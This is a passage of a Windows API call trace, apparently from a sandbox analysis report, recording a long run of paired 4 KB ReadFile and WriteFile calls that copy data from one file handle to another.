1 [0067.102] GetFileType (hFile=0x33c) returned 0x1 [0067.102] ReadFile (in: hFile=0x33c, lpBuffer=0x2595fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2595fa0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.103] ReadFile (in: hFile=0x33c, lpBuffer=0x2595fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2595fa0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.103] WriteFile (in: hFile=0x324, lpBuffer=0x25971b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25971b8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.108] ReadFile (in: hFile=0x33c, lpBuffer=0x2595fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2595fa0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.108] WriteFile (in: hFile=0x324, lpBuffer=0x25971b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25971b8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.108] ReadFile (in: hFile=0x33c, lpBuffer=0x2595fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2595fa0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.108] WriteFile (in: hFile=0x324, lpBuffer=0x25971b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25971b8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.109] ReadFile (in: hFile=0x33c, lpBuffer=0x2595fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2595fa0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.109] WriteFile (in: hFile=0x324, lpBuffer=0x25971b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25971b8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.109] ReadFile (in: hFile=0x33c, lpBuffer=0x2595fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2595fa0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.109] WriteFile (in: hFile=0x324, lpBuffer=0x25971b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25971b8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.110] ReadFile (in: hFile=0x33c, lpBuffer=0x2595fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2595fa0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.110] WriteFile (in: hFile=0x324, lpBuffer=0x25971b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25971b8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.110] ReadFile (in: hFile=0x33c, lpBuffer=0x2595fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2595fa0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.110] WriteFile (in: hFile=0x324, lpBuffer=0x25971b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25971b8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.111] ReadFile (in: hFile=0x33c, lpBuffer=0x2595fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2595fa0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.111] WriteFile (in: hFile=0x324, lpBuffer=0x25971b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25971b8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.111] ReadFile (in: hFile=0x33c, lpBuffer=0x2595fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2595fa0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.111] WriteFile (in: hFile=0x324, lpBuffer=0x25971b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25971b8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.114] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.114] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.115] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.115] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.115] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.115] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.115] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.115] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.116] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.116] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.116] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.116] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.117] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.117] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.117] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.117] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.117] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.118] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.118] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.118] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.118] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.118] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.119] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.119] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.119] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.119] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.119] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.119] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.120] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.120] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.120] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.120] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.122] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.122] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.122] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.122] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.122] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.122] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.123] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.123] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.123] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.123] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.123] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.123] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.124] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.124] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.124] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.124] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.125] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.125] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.125] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.125] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.125] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.125] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.126] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.126] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.126] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.126] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.126] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.127] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.127] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.127] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.127] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.127] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.129] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.129] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.129] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.129] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.130] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.130] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.130] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.130] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.130] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.131] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.131] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.131] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.131] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.131] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.132] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.132] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.132] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, 